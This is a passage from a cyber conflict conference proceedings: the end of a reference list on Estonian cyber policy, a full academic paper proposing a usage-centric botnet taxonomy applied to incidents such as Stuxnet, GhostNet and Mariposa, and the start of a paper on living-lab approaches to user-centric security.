(116 SE) (In Estonian). Retrieved from
http://www.riigikogu.ee/?page=pub_file&op=emsplain&content_type=application/msword&u=20090902161440&
63

Christian Czosseck et al.
file_id=198499&file_name=KarS seletuskiri
(167).doc&file_sise=66048&mnsensk=166+SE&etapp=03.12.2007&fd=29.10.2008.
Estonian Government. (2009). Valitsus kiitis heaks küberjulgeoleku strateegia rakendusplaani aastateks 2009–2011.
Retrieved from http://uudisvoog.postimees.ee/?DATE=20090514&ID=204872.
Estonian Government. (2010). Explanatory Memorandum to the Act amending the Electronic Communications Act
(424 SE) (In Estonian). Retrieved from
http://www.riigikogu.ee/?page=pub_file&op=emsplain&content_type=application/msword&file_id=535868&file_n
ame=elektroonilise side muutmine seletuskiri (424).doc&file_size=31650&mnsensk=424+SE&fd=.
Evron, G. (2008). Battling botnets and online mobs: Estonia’s defense efforts during the internet war. Georgetown
Journal of International Affairs, 9(1), 121–126.
Farivar, C. (2009). A Brief Examination of Media Coverage of Cyberattacks (2007 - Present). In C. Czosseck & K.
Geers (Eds.), The Virtual Battlefield: Perspectives on Cyber warfare (pp. 182 - 188). IOS Press.
Geers, K. (2010). Live Fire Exercise: Preparing for Cyber War. Journal of Homeland Security and Emergency
Management, 7(1).
Hyacinthe, B. (2009). Cyber Warriors at War. Xlibris, pp. 82-85.
Hyacinthe, B. & Fleurantin, L. (2007). Initial supports to regulate information warfare’s potentially lethal information
technologies and techniques. Proceedings of the 3 rd International Conference on Information Warfare and
Security (pp. 206-207). Academic Conferences Limited.
Kash, W. (2008). Lessons from the cyberattacks on Estonia. Retrieved from http://gcn.com/articles/2008/06/13/laurialmann--lessons-from-the-cyberattacks-on-estonia.aspx.
Kaska, K., Talihärm, A.-M., & Tikk, E. (2010). Building a Comprehensive Approach to Cyber Security. CCD COE
Publications.
Landler, M., & Markoff, J. (2007). In Estonia, what may be the first war in cyberspace. The New York Times.
Retrieved from http://www.nytimes.com/2007/05/28/business/worldbusiness/28iht-cyberwar.4.5901141.html.
Lemay, A., Fernandeza, J. M., & Knight, S. (2010). Pinprick attacks, a lesser included case? In C. Czosseck & K.
Podins (Eds.), Conference on Cyber Conflict Proceedings (pp. 183 - 194). Tallinn: CCD COE Publications.
Liles, S. (2010). Cyber Warfare: As a form of low-intensity conflict and insurgency. In C. Czosseck & K. Podins
(Eds.), Conference on Cyber Conflict Proceedings (pp. 47 - 57). Tallinn: CCD COE Publications.
MoD. (2004). National Security Concept of the Republic of Estonia.
MoD. (2008). Cyber Security Strategy. Retrieved from
http://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdf.
MoD. (2010). NATIONAL SECURITY CONCEPT. Retrieved from
http://www.kmin.ee/files/kmin/nodes/9470_National_Security_Concept_of_Estonia.pdf.
MoEAC. (2006). Estonian Information Society Strategy 2013. Retrieved from
http://www.riso.ee/en/system/files/Estonian Information Society Strategy 2013.pdf.
MoEAC. (2007). Implementation Plan 2007-2008 of the Estonian Information Society Strategy.
MoEAC. (2009). Statute for the Development of National Information System (in Estonian). Retrieved from
https://www.riigiteataja.ee/akt/13219897.
MoFA. (2010a). Estonia Supports Council of Europe in Fight Against Cyber Crime. Retrieved from
http://www.vm.ee/?q=en/node/9315.
MoFA. (2010b). Foreign Minister Paet Invited EU and Southeast Asian Nations to Co-operate in Backing Cyber
Defence. Retrieved from http://www.vm.ee/?q=en/node/9512.
MoFA. (2010c). National Experts Shared Cyber Security Recommendations with UN Secretary General. Retrieved
from http://www.vm.ee/?q=en/node/9722.
MoI. (2009). Estonian Emergency Act (unofficial translation). Retrieved January 4, 2011, from
http://www.legaltext.ee/et/andmebaas/tekst.asp?loc=text&dok=XXXXX26&keel=en&pg=1&ptyyp=RT&tyyp=X&q
uery=h daolukorra.
MoI. (n.d.). Ministry of the Interior, Department of crisis management and rescue policy (in Estonian). Retrieved
January 4, 2011, from http://www.siseministeerium.ee/elutahtsad-valdkonnad-ja-teenused-2.
MoJ. (2010a). Guidelines for Development of Criminal Policy until 2018. Retrieved from
http://www.just.ee/arengusuunad2018.
MoJ. (2010b). Estonian Code of Criminal Procedure (unofficial translation). Retrieved from
http://www.legaltext.ee/text/en/X60027K6.htm.
NATO. (2010). Strategic Concept for the Defence and Security of the Members of the NATO. Retrieved December
30, 2010, from http://www.nato.int/cps/en/natolive/official_texts_68580.htm.
Nazario, J. (2007). Estonian DDoS Attacks – A summary to date. Retrieved from
http://asert.arbornetworks.com/2007/05/estonian-ddos-attacks-a-summary-to-date/.
Nazario, J. (2009). Politically Motivated Denial of Service Attacks. In C. Czosseck & K. Geers (Eds.), The Virtual
Battlefield: Perspectives on Cyber Warfare (pp. 163-181). 163-181: IOS Press.
Odrats, I. (Ed.). (2007). Information Technology in the Public Administration of Estonia Yearbook 2007. Ministry of
Economic Affairs and Communication.
Ottis, R. (2008). Analysis of the 2007 Cyber Attacks Against Estonia from the Information Warfare Perspective.
Proceedings of the 7th European Conference on Information Warfare (p. 163). Academic Conferences Limited.
Ottis, R. (2009). Theoretical Model for Creating a Nation-State Level Offensive Cyber Capability. 8th European
Conference on Information Warfare and Security (pp. 177-182). Academic Publishing Limited.
Tikk, E., Kaska, K., & Vihul, L. (2010). International Cyber Incidents: Legal Considerations (p. 130). Tallinn: CCD
COE Publications.
64

An Usage-Centric Botnet Taxonomy
Christian Czosseck and Karlis Podins
Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia
Christian.Czosseck@ccdcoe.org
Karlis.Podins@ccdcoe.org
Abstract: Botnets have been a recognized threat to computer security for several years. On the timeline of malware
development, they can be seen as the latest evolutionary step. Criminals have taken advantage of this new technology
and cyber crime has grown to become a serious and sophisticated problem which law enforcement still finds
difficult to deal with. In the past few years we are witnessing a movement away from cyber crime. Nation states become
the target of attacks as well as actively using botnets to project their own power in the political or military domain.
To study the new and emerging cases of botnet usage we propose an usage-centric botnet taxonomy. Although
there are already a number of botnet taxonomies published, most of them have a technical viewpoint and
often consider cyber crime as the major driver to use botnets. While it may be true for now, we believe that such approach
might not be holistic enough to describe the current and future developments. Besides the trend of specialized
botnets being developed, the number of botnet users is increasing, with new motivations coming along. The
taxonomy proposed in this paper takes a different viewpoint by focusing less on technical attributes than on the actors
using botnets and the functionality requested by them. Major difference from existing research is that proposed
taxonomy classifies instances of botnet use. Based on existing taxonomies, case studies of recent botnet incidents
and cyber warfare doctrines of selected nation-states, we explore theoretical and already seen ways of botnet usage.
We propose new classification of botnets based on their technological attributes, the users and the intended effects
on the target to provide a holistic picture of the current situation. We also test the proposed taxonomy on seven instances
of botnet use.
Keywords: botnets, taxonomy, incident categorization
1. Introduction
Botnets, large numbers of remote controlled computers distributed all over the Internet and centrally controlled
by so-called botmasters, are a persistent and continuously evolving threat to the Internet community,
always seeming to be one step ahead of countermeasures and take-down attempts. Over the last
years we have seen more and more sophisticated botnets, improving in multiple aspects like size, resistance
to countermeasures and ways of spreading. A whole underground economy developed around
botnets (Klein et al. 2011). More and more botnets have become a service offered by knowledgeable
malware developers, ready to be rented out to everyone willing to pay (Schwartz 2010; Mills 2009). Besides
technological evolution, the number of players as well as their motivations to use botnets is increasing.
The recent history has witnessed several incidents where botnets were not used for financial benefit,
but to deliver a political message, to conduct espionage or as an instrument for sabotage. The increasing
diversity of botnet incidents requires for a structured botnet classification.
The usage-centric botnet taxonomy presented in this paper is designed to classify botnet events by
means of usage, not botnets per se. By this our approach differs from other published taxonomies on
botnets, which mostly focus on technical aspects.
The rest of this paper is structured as following: In section 2 we give an overview on related work of botnet
taxonomies, motivating the uniqueness of our taxonomy; it will be described in the following section 3.
We test the performance of the proposed taxonomy in Section 4 by categorizing a selection of recent
botnet incidents according to it. Finally the conclusions and a discussion of future work are provided in
Section 5.
2. Related work
Technical details of botnets and their highly visible functionality like DDoS attacks are well studied in scientific
literature. But strategic aspects like motivation are rarely covered. (Weaver et al. 2003) present the
Taxonomy of Computer Worms. They introduced payload and motivation attributes similar to the functionality
and motivation attribute presented in this paper’s taxonomy. (Weaver et al. 2003) present a more
fine-grained classification in their features. On the other hand we separate users from their motivation,
being combined to one in (Weaver et al. 2003). They also do not consider self-infection.
Detailed technical-level taxonomy of attacks and thorough literature review of technical-level taxonomies
is given by (Hansman & Hunt 2005).
65

Christian Czosseck and Karlis Podins
A technical defense-centric taxonomy of computer attacks is given in (Killourhy et al. 2004), where the
authors discuss network level attack detection and classification. Several attack types like Denial of Service
and Surveillance/Probing (corresponds to Information theft in the proposed taxonomy) are discussed
in (Lippmann et al. 1998). (Distributed) Denial-of-Service (DDoS/DoS) attacks have been studied by (Lau
et. al, Distributed Denial of Service Attacks). (Wun et al. 2007; Asosheh & Ramezani 2008; Wood &
Stankovic 2004) offer taxonomies not limited to DDoS as such but covering architectural aspects of botnets
like command-and-control structures or spreading strategies. Taxonomies of DoS attacks and countermeasures
against them have been presented by (Champagne & Lee 2006; Mirkovic & Reiher 2004). A
more detailed description of botnets internals including a comprehensive list of way how to use botnets
several kinds of botnet usage) is presented by (Bacher et al. 2005; Barford & Yegneswaran 2007)The
fast flux functionality provided by some botnets is covered in (Holz et al. 2008) and (Jose Nazario & Holz
2008).
Majority of research has considered botnets as collections of machines which are infected without the
knowledge or consent of the respective owners (Klein et al. 2011). Recently in a small number of politically-tainted
incidents botnet software has been installed intentionally by the owners (Ottis 2008; Panda
Security 2010).
3. A usage-centric botnet taxonomy
Following the criteria for an effective taxonomy as introduced in (Killourhy et al. 2004), our taxonomy was
designed to follow the principles of be mutual exclusiveness, exhaustiveness and replicability providing
an instrument to classify botnet incidents of the past but also to deal with upcoming events. It consists of
four features: 1. Users of botnets, 2. Motivations of botnet usage, 3. Functionality applied, and 4. Way of
infection. A complete overview is provided in figure 1.
Figure 1: Usage-centric Botnet taxonomy
66

3.1 Users of botnets
Christian Czosseck and Karlis Podins
Over the past years, developing and using botnets have become a profitable business. A well developed
underground economy, providing botnet technology and services to everyone who pays (Mills 2009). The
easy access to botnets introduces new players and motivations to appear. The first attribute of this taxonomy
covers the user of the botnet and is motivated by a legal viewpoint considering who could be held
liable for the action done.
Exclusion of middlemen
Over the time it has been witnessed that the underground economy has changed to a new serviceoriented
model, offering botnets for rent (Schwartz 2010; Mills 2009). This way a third party besides botnet
user and the target gets involved. While these servicemen are important players, our taxonomy focuses
on the perpetrator only. We disregard the involvement of middlemen in the incidents, although they
might be held responsible for the damages caused.
Individuals are private persons using botnets independently.. This includes private persons using botnets
for financial gain, education or out of curiosity. But also those, who want to express their opinion with digital
force or support a political or ideological activity e.g. patriotic hacking, as in the case of the cyber attacks
against Estonia in 2007 (Ottis 2008) or participants in the Operation Payback (Correll 2010). From
a legal viewpoint, it is the individual who could be made responsible.
Groups shall cover all forms of collaborative and coordinated, but still loose group of individuals. It does
not include groups formed based on a legal person (e.g. a company), and as such leaves only every single
individual as being responsible for their actions. Persons with different roles might face different consequences,
though. This covers examples where a group of persons were acting as a whole and out of
internal motivation, as seen to a certain part in the Operation Payback incident with regards to the role of
Anonymous (Panda Security 2010) and the later founded AnonOps (AnonOps 2010).
Groups also include examples of organized crime organizations, which do not use a legal body as a facade.
Organizations, in contrast to groups, are mainly defined by the legal person representing them. Beside of
the individuals within the organization (and their personal liability), there is a legal person according to
private law, which can be made responsible. This covers all companies using botnets for e.g. getting an
(economic) advantage over another party, and to a limited extent on organized crime, if they also use a
legal person for conduction at least parts of their operations. This class shall also include organizations
established under international, private law.
State Actors are the type of users this taxonomy defines, and shall cover all organizations established
under public national or international law. These include esp. parts of the executive power of a state, like
police, military or intelligence services.
3.2 Motivations for botnet usage
Botnets are powerful and flexible tools providing their user with wide variety of functionality. While many
different features of the botnet can be used at the same time, they are connected by the single motivation
of the perpetrator at the time of usage. The second attribute provides the following broad classes of motivation
behind botnet usage, which are similar to Motivations and Attackers identified by (Weaver et al.
2003).
Education & Research covers all activities done for the sake of getting familiar with the botnets, independently
if one is interested in using, developing, analyzing or defending against botnets. The key attribute
for this taxon is absence of a clear target e.g. violate somebody’s rights or property.
Seeking Financial Gain is maybe the most common motivation for using botnets nowadays. This includes
most cases of information theft, like stealing bank or credit cards information or license keys, as this information
will be monetized nearly immediately by either using or selling it.
Espionage covers all cases where stolen information is not intended to be turned into money directly or at
all. Instead, the gathered knowledge is used to influence own decisions, the relationship between parties
67

Christian Czosseck and Karlis Podins
or to enhance an own situation awareness. This taxon is independent from the User of the Botnet as defined
in the previous section and as such covers e.g. cases of state spying or industrial espionage.
The Manipulation by Sending Data is an umbrella class for all cases of botnet usage, where an outward
directed data flow (from the viewpoint of the infected machine) is used a) to expression one owns opinion
on something; or b) to manipulate someone other’s opinion by sending wrong or misleading information.
The first sub-category covers cases like hacktivism (Denning 2001; Ottis 2008), where groups of persons
use botnets to attack others, e.g. disturbing normal functionality of provided services, to support their political
message. The second sub-attribute covers cases of propaganda or manipulation of services or outcomes
of polls or voting, leading to a wrong final picture for others (Temmingh & Geers 2009a).
On the other hand Manipulation by Filtering Data shall cover all cases where denying access to information
is the main reason for the botnet usage. This covers cases of censorship (see e.g. the Belarus case
in Pavlyuchenko 2009), information blockages or redirection.
Botnets can be used as an instrument to Project Power in cyber space. To adopt Clausewitz freely, botnets
can be used as a tool to influence another party's behavior or policy, after non-violent options are
exhausted. This shall include, but not be limited to cases where botnets became part of military operations
(e.g. the InfoOp against Georgia friendly news portals and governmental websites descried in
J. Nazario, 2009), or could be used to damage another’s economy (Lemay et al. 2010). We also include
cases of sabotage (like in the case of Stuxnet, see Falliere et al. 2010), or blackmailing (Sophos 2006) to
be included here. It needs to be stressed here, that this taxon is independent from the user of botnets
and as such reaches from individuals to state actors.
To Evade Attribution is one other reason one might want to consider using botnets. The mostly global
distribution of botnets allows the user to let its victim believe that someone else was behind the cyber
attack. This can even be extended to the intention to run a false flag operation. While botnets are not the
only possible way to reach this goal, it is for sure a convenient one. As transnational cooperation in fighting
cyber crime is still not developed globally, and not all nation states enjoy friendly relationships, disguising
one real location and identity can be the reason to use botnets. Another scenario included is the
(massive, distributed) acquisition of resources. Here the availability of the sheer number of zombies in the
botnets, and with it the combined CPU processing power or storage capacity is used to set up a distributed
service, there any single node does not have enough knowledge so that even if forensically analyzed,
the service as a whole is not endangered or compromised.
3.3 Functionality
The functionality provided by a botnet is highly dependent on the developer of the botnet and can vary
quite significantly between botnets. A fundamental feature of all botnets is the ability to remotely control
computers and the ability to send files to them, e.g. for updating the bot client later on. On top of this a
variety of different functions has been developed and became part of many botnets, while not all share
always the same features. As of the common update feature, enhancing a botnet's capabilities later on is
most often possible.
The third attribute of this taxonomy provides a set of generic features botnets might have. It combines
features already seen in botnets over the past years, and also some new ones, the authors believe them
to be reasonable to consider as they might been seen in the near future.. While this list has been prepared
with care, based among others on (Weaver et al. 2003; Bacher et al. 2005), this is not claimed to
be complete. The future might show new functionality not thought of till now.
Denial of Service (DoS) is the ability to disrupt the normal functionality of the infected machine as a
whole. This enables the botnet master to shut down or even damage the infected system, making a recovery
at least difficult.
Distributed Denial of Service (DDoS) is a functionality whereby a large number of service requests are
directed to a target system, exhausting its available resources to especially answer to desired requests.
For these attacks, the number of used botnet clients is the main criteria for the success of the DDoS,
while is recognized that more sophisticated attack techniques might lead to a lower number of necessary
bots to attack the target.
68

Christian Czosseck and Karlis Podins
Information theft of data stored or processed on the infected machine or traffic passing or reaching it is
another commonly seen functionality of botnets (Klein et al. 2011). This includes but not limits to the
search for specific files, passwords or other sensitive data stored or typed into the infected workstation,
e.g. banking credentials.
Uploading data, as the opposite of information theft, enables the botnet owner to deliver any desired file
onto the infected machine. A basic implementation of this functionality is most often standard for all botnets,
as it is necessary to update the installed malware. Beside this, the installation of additional software,
e.g. further spyware, advertisement add-ons, or Browser Helper Objects is frequently seen (Bacher et al.
2005). In a bigger scale this could be used to implement a regional surveillance system (see e.g. the idea
presented in Husted & Myers 2010).
But the botnet owner is not limited to, as he can basically upload any file he wants to the infected machine,
and as such could e.g. place compromising or illegal data. Another special case of this taxon is the
use of the botnet as a launch platform for other malware, accelerating its spreading by magnitude or enables
regional targeted distribution of it like in the case of Stuxnet (Falliere et al. 2010).
This also includes the manipulation of existing files on the infected system to change their intended functionality.
It is e.g. not uncommon for malware to disable running AV software or restricting access to AV
websites (Porras et al. 2009).
Proxying is the ability to use the infected clients to execute actions on behalf of the botnet master, without
him being revealed directly. Known cases are Spam campaigns, where the bots as tasked to send massively
emails to a target group. Using a limited number of bots to form a proxy chain can provide functionality
similar to anonymization services like the TOR network, where tracking traffic routes is close to
impossible. Or they are used to hide the real location of some critical services, like phishing site or C&C
servers, by implementing fast-flux domains (Jose Nazario & Holz 2008). Another not often seen way of
using this functionality would be the manipulation of voting (Temmingh & Geers 2009b) or click-based
(advertisement) services (Bacher et al. 2005).
Distributed resource clustering is a newly introduced function not commonly used so far. But the authors
believe that there is room for botnet herders to explore this area more. It is understood that all the other
mentioned functions also use resources of the infected machine to execute the mission they are tasked
with. This taxon of botnet usage assume the botnet herder to combine the available resources, namely
CPU time or HDD space to build a service like known from the domain of clustered computing or cloud
computing. The resource made available this way would enable him e.g. to conduct distributed calculations
which could be useful for password cracking or to set up a distributed storage, where any member
of the botnet holds part of the data the botnet herder wants to store. If designed well he could store huge
amount of data, redundant and segmented in the botnet without any single bot client having enough parts
for reconstruction a complete picture.
3.4 Way of infection
Enforced Infection:
Most botnets usually behave like any other malware trying to infect as many hosts as possible, spreading
autonomously if ordered to do so. Computers are infected and join botnets without the knowledge or consent
of the owner. Malware developers are actively developing and looking for new exploits to infect new
hosts, and so far they are quite successful (Klein et al. 2011)
Voluntary Self-infection:
Besides the mentioned common way of infection, there have been a number of cases when owners voluntarily
infected their machines to join a botnet. By doing that they supported a certain (politically motivated)
cause, e.g. incidents in Estonia 2007 and Operation Payback 2010 (Ottis 2008; Panda Security
2010).
4. Application of the taxonomy
In order to test how well the taxonomy classifies events of botnet usage, we look at a selection of recent
incidents involving botnets. These events are chosen to represent a wide variety of botnet uses; their or-
69

Christian Czosseck and Karlis Podins
der does not reflect any sort order of importance. In some cases, several closely-related incidents are
classified together as a group, because different events using the same bots happened at the same time.
An overview is presented in Table 1.
4.1 Stuxnet
Although the number of Stuxnet infected hosts was small and spreading was highly targeted, the most
basic features of botnets being the existence of a command and control capability support to consider
Stuxnet as a botnet. (Falliere et al. 2010)
While categorizing this incident using the proposed taxonomy, the lack of trustworthy, full information left
the attribute of Users of Botnets hard to decide. While there are many speculations on this, we decided to
assume at least one state actor being involved. The Motivation is covered by the power projection taxon
including sabotage, which seems to be the most likely motivation behind this incident. Stuxnet spread by
involuntary infection, and its manipulation and damaging industrial systems represents a denial of service
functionality.
4.2 GhostNet
There is no evidence on who are the players behind GhostNet. Speculations reach from (groups of) individuals
up to state actors. As such we leave the user as unknown. But the small number of infected hosts
(around 1300) and percentage of high-value targets (up to 30% of infected hosts belonged to ministries of
foreign affairs, embassies, international organizations etc.) indicate that the motivation was espionage
against pro-Tibet community. In order to do that, GhostNet was performing information theft from involuntary
infected machines. (Deibert et al. 2009)
4.3 Operation payback
The Operation Payback was launched by a group of WikiLeaks supporters, after multiple financial service
providers stopped their services for WikiLeaks after the latest, massive disclosure of classified US documents.
The attacks were carried out by using an open source network attack application called Low Orbit Ion
Cannon. The attacks were coordinated by using internet forums, Twitter and some C&C servers (Pras et
al. 2010; Panda Security 2010; Correll 2010). According to our taxonomy, we classify the motivation as
projecting power. The functionality of choice was DDoS attacks and the participation in this event was
voluntarily.
4.4 Help-Israel-Win
A group of pro-Israel activists, in their campaign against Hamas (power projection) set up a website also
hosting software for download, to voluntarily join a botnet under the control of this group. Based on the
information released by this group, they use the botnet to conduct DDoS attacks against pro-Palestinian
web sites. To which extend they were successful, or if they have launched any attacks at all is still unclear.
(Shachtman 2009)
4.5 Conficker
Till now it is publicly not known, who the developers and users of Conficker are. But the analysis of this
malware and the speed with which this botnet adapted to counter measures lets us assume, that at least
a group of persons is behind Conficker. The lack of any executed functionality beside file transfer to update
the infected clients with last versions of Conficker allows the assumption that Conficker was mainly
developed as a proof-of-concept and as such falls under Education&Research. Conficker infected its host
involuntary. (Porras et al. 2009)
4.6 Mariposa
The Mariposa botnet, claimed to be one of the world’s largest botnets ever, was developed and used by
an international group of criminals for financial gain. They harvested banking credentials and credit card
data (information theft) as well as used it for launching DDoS attacks. The victims were all infected involuntarily
(McMillan 2010).
70

4.7 Belarus censorship
Christian Czosseck and Karlis Podins
The Belarus state has a longer history of enforcing Internet censorship on its citizens with regards to regime-critical
information. Chapter ’97, a leading venue for public discussions in Belarus, suffered regularly
under state sponsored cyber attacks against their website. In April, 2008 DDoS attack took them
down to block state-independent news coverage of protest ongoing in the streets (manipulation by filtering
data).
While Belarus officials denied official involvement, it is assumed that they were not actively countering the
attacks. As such we classify this incident as done by a state actor. As the used botnets are unknown, the
infection way cannot be decided upon. (Pavlyuchenko 2009)
Table 1: Overview of selected incidents and their classification
Example
User Motivation Functionality Way of infection
Stuxnet State Actor Power Projection Denial of Service Involuntary
GhostNet Unknown Espionage Information theft Involuntary
Operation Payback Group Power projection DDoS Voluntary
Israeli Group Power Projection DDoS Voluntary
Conficker Group Education&Research none Involuntary
Mariposa Group Financial Gain Information Theft/
DDoS
Involuntary
5. Conclusions
Easy access to botnets makes them available to all kind of parties, not all of them particularly interested
in monetary revenue, but increasingly pursuing political and military aims. With this the common interpretation
of monetary motivated cyber crime being the main driver behind the usage of botnet does not sufficiently
cover the current situation anymore.
We have presented a usage-centric taxonomy, which provides a structured approach to compare different
botnet incidents.
Two distinct applications of the proposed taxonomy were considered; firstly to analyze and categorize
past and current botnet incidents. The applicability of the taxonomy has been shown on a selection of
recent botnet incidents. The performance of the usage-centric taxonomy in classifying the selected incidents
gives hopes that the proposed taxonomy will be helpful in understanding other botnet incidents.
This might motivate to structure countermeasures in a similar way and developing an instrument to organize
and select responses on different levels.
Another application is to help thinking about novel ways of using botnets. By pre-selecting some attributes,
the taxonomy allows for structured and systematic search thru the remaining attributes. By this, the
taxonomy might find interesting and novel botnet-related threats and lead to improvements of existing or
forthcoming risk assessments and as such helps to improve cyber security on institutional down up to
national level.
This taxonomy was designed defining generic taxon, able to be matched even future incidents and is believed
to cover most seen so far. Nevertheless the future might show the need to amend the list of taxa,
especially the one of Functionalities applied.
Disclaimer
The opinions expressed here are those of the authors and should not be considered as the official policy
of the Cooperative Cyber Defence Centre of Excellence or NATO.
References
AnonOps, 2010. Welcome to AnonOps Network | Anonymous Operations (AnonOps), HACKERS ON STEROIDS.
Available at: http://www.anonops.ru/ [Accessed February 9, 2011].
Asosheh, A. & Ramezani, N., 2008. A comprehensive taxonomy of DDoS attacks and defense mechanism applying
in a smart classification. WSEAS Transactions on Communications, 7(4), pp.281-290.
Bacher, P. et al., 2005. Know your enemy: Tracking botnets. The Honeynet Project.
Barford, P. & Yegneswaran, V., 2007. An inside look at botnets. Malware Detection.
71

Christian Czosseck and Karlis Podins
Champagne, D. & Lee, R., 2006. Scope of DDoS countermeasures: taxonomy of proposed solutions and design
goals for real-world deployment. on Systems and Information Security (SSI).
Correll, S.-P., 2010. ’Tis the Season of DDoS – WikiLeaks Edition | PandaLabs Blog. Pandalabs. Available at:
http://pandalabs.pandasecurity.com/tis-the-season-of-ddos-wikileaks-editio/ [Accessed February 9, 2011].
Deibert, R. et al., 2009. Tracking GhostNet: Investigating a Cyber Espionage Network. Information Warfare Monitor,
Munk Centre, JR02-2009, March, 29.
Denning, D.E., 2001. Activism, hacktivism, and cyberterrorism: the internet as a tool for influencing foreign policy.
Networks and netwars: The future of terror, crime, and militancy, p.239–288.
Falliere, N., Murchu, L.O. & Chien, E., 2010. W32. Stuxnet Dossier. Symantec Security Response, 3(November),
pp.1-64.
Hansman, S. & Hunt, R., 2005. A taxonomy of network and computer attacks. Computers & Security, 24(1), pp.31-
43.
Holz, T. et al., 2008. Measuring and detecting fast-flux service networks. In Symposium on Network and Distributed
System Security. Citeseer.
Husted, N. & Myers, S., 2010. Mobile location tracking in metro areas: malnets and others. In Proceedings of the
17th ACM conference on Computer and communications security. ACM, p. 85–96.
Killourhy, K.S., Maxion, R. a & Tan, K.M.C., 2004. A defense-centric taxonomy based on attack manifestations,
IEEE.
Klein, G., Leder, F. & Czosseck, C., 2011. On the Arms Race Around Botnets - Setting Up and Taking Down Botnets.
In C. Czosseck & K. Podins, eds. 2011 3rd International Conference on Cyber Conflicts. Tallinn: CCD COE
Publications (in press).
Lemay, A., Fernandeza, J.M. & Knight, S., 2010. Pinprick attacks, a lesser included case? In C. Czosseck & K. Podins,
eds. Conference on Cyber Conflict Proceedings. Tallinn: CCD COE Publications, pp. 183 - 194.
Lippmann, R.P. et al., 1998. Evaluating intrusion detection systems: the 1998 DARPA off-line intrusion detection
evaluation. Proceedings DARPA Information Survivability Conference and Exposition. DISCEX 00, pp.12-26.
McMillan, R., 2010. Spanish police take down massive mariposa botnet. IDG News. Available at:
http://www.pcworld.com/businesscenter/article/190634/spanish_police_take_down_massive_mariposa_botnet.h
tml [Accessed February 9, 2011].
Mills, E., 2009. “Golden Cash” network - rent a botnet - ZDNet. CNET News. Available at:
http://www.zdnet.com/news/golden-cash-network-rent-a-botnet/312957 [Accessed February 9, 2011].
Mirkovic, J. & Reiher, P., 2004. A taxonomy of DDoS attack and DDoS defense mechanisms. ACM SIGCOMM Computer
Communication Review, 34(2), p.39.
Nazario, J., 2009. Politically Motivated Denial of Service Attacks. In C. Czosseck & K. Geers, eds. The Virtual Battlefield:
Perspectives on Cyber Warfare. Amsterdam: IOS Press, p. 2010–05.
Nazario, Jose & Holz, T., 2008. As the net churns: Fast-flux botnet observations. In Malicious and Unwanted Software,
2008. MALWARE 2008. 3rd International Conference on. IEEE, p. 24–31.
Ottis, R., 2008. Analysis of the 2007 Cyber Attacks Against Estonia from the Information Warfare Perspective. In
Proceedings of the 7th European Conference on Information Warfare. Academic Conferences Limited, p. 163.
Panda Security, 2010. The Anonymous cyber-activist group, responsible for the attack on Spain’s SGAE and other
copyright societies, launches further attacks in defense of Wikileaks founder | Press Panda Security. Panda Security.
Available at: http://press.pandasecurity.com/news/the-anonymous-cyber-activist-group-responsible-forthe-attack-on-spain’s-sgae-and-other-copyright-societies-launches-further-attacks-in-defense-of-wikileaksfounder/
[Accessed February 9, 2011].
Pavlyuchenko, F., 2009. Belarus in the Context of European Cyber Security. In C. Czosseck & K. Geers, eds. The
Virtual Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press.
Porras, P., Saidi, H. & Vinod, Y., 2009. An Analysis of Conficker,
Pras, A. et al., 2010. Attacks by “ Anonymous ” WikiLeaks Proponents not Anonymous,
Schwartz, M.J., 2010. Pssst...Want To Rent A Botnet? - Darkreading. Dark Reading. Available at:
http://www.darkreading.com/security/vulnerabilities/225200525/index.html [Accessed February 9, 2011].
Shachtman, N., 2009. Wage cyberwar against hamas, surrender your pc. Wired. Available at:
http://www.wired.com/dangerroom/2009/01/israel-dns-hack/ [Accessed February 11, 2011].
Sophos, 2006. Online Russian blackmail gang jailed for extorting $4m from gambling websites. Sophos.com. Available
at: http://www.sophos.com/pressoffice/news/articles/2006/10/extort-ddos-blackmail.html [Accessed February
9, 2011].
Temmingh, R. & Geers, K., 2009a. Virtual Plots, Real Revolution. In C Czosseck & K Geers, eds. The Virtual Battlefield:
Perspectives on Cyber Warfare. IOS Press, pp. 294-302.
Temmingh, R. & Geers, Kenneth, 2009b. Virtual Plots, Real Revolution. In Christian Czosseck & Kenneth Geers,
eds. The Virtual Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press, pp. 294-302.
Weaver, N. et al., 2003. A taxonomy of computer worms. In Proceedings of the 2003 ACM workshop on Rapid Malcode.
ACM, p. 11–18.
Wood, A. & Stankovic, J., 2004. A taxonomy for denial-of-service attacks in wireless sensor networks. of Sensor
Networks: Compact Wireless and.
Wun, A., Cheung, A. & Jacobsen, H.-A., 2007. A taxonomy for denial of service attacks in content-based publish/subscribe
systems, New York, New York, USA: ACM Press.
72

User-Centric Information Security Systems - A Living lab
Approach
Moses Dlamini 1, 2 , Jan Eloff1, 2 , Marek Zielinksi 1,2 , Jason Chuang 1 and Danie Smit 1
1
SAP Research/Meraka UTD, Pretoria, South Africa
2
University of Pretoria, South Africa
moses.dlamini@sap.com
jan.eloff@sap.com
marek.zielinski@sap.com
jason.chuang@sap.com
danie.smit@sap.com
Abstract: For the past forty years, security experts have spent billions of dollars trying to improve security
technologies. However, security systems are continually failing to protect end users’ information systems and their
information. Security experts claim that the end users are the weakest link in the security chain, and the end users
claim that security features of systems are complex and full of gaping security vulnerabilities and they are an
overhead that hinders their work. There is clearly a disjoint here. This paper introduces the concept of a Living Lab to
help improve the current status and provide user-centric security systems.
Keywords: information security system, living lab, user-centric security
1. Introduction
All along information security experts have spent billions of dollars doing their best to strengthen security
tools and technologies. This is reflected in the recent advances in access control policies, quantum
cryptography, state of the art host-based and perimeter firewalls, 360-degree anti-viruses, anti-spyware,
spam filters, real-time intrusion detection and prevention systems, multi-factor authentication, and other
information security controls. However, the problem of information insecurity still persist and with
increasing consequences. Even with the high regulatory compliance penalties for breached
organisations, information security mechanisms still fail to protect the end user information systems and
the information they hold. This is an indication that a technological focus alone cannot solve the problems
of information insecurity (Miller 2010 and Dlamini 2010).
Having done their level best in strengthening the technologies, security experts are now pointing fingers
at the end users claiming they are “inherently insecure” (Sasse, Brostoff & Weirich 2001). End users are
incapable of using security tools and they have unacceptably slow speed and accuracy when dealing with
security operations (Smith 2003). Hence, end users are now commonly referred to as the “weakest link in
the information security chain” (Izadi et al. 2009; Asher Aumasson & Phan 2009; Patrick, Long & Flinn
2003; Sasse et al. 2001 and Schneier 2000). From the security experts’ point of view, the insecurity
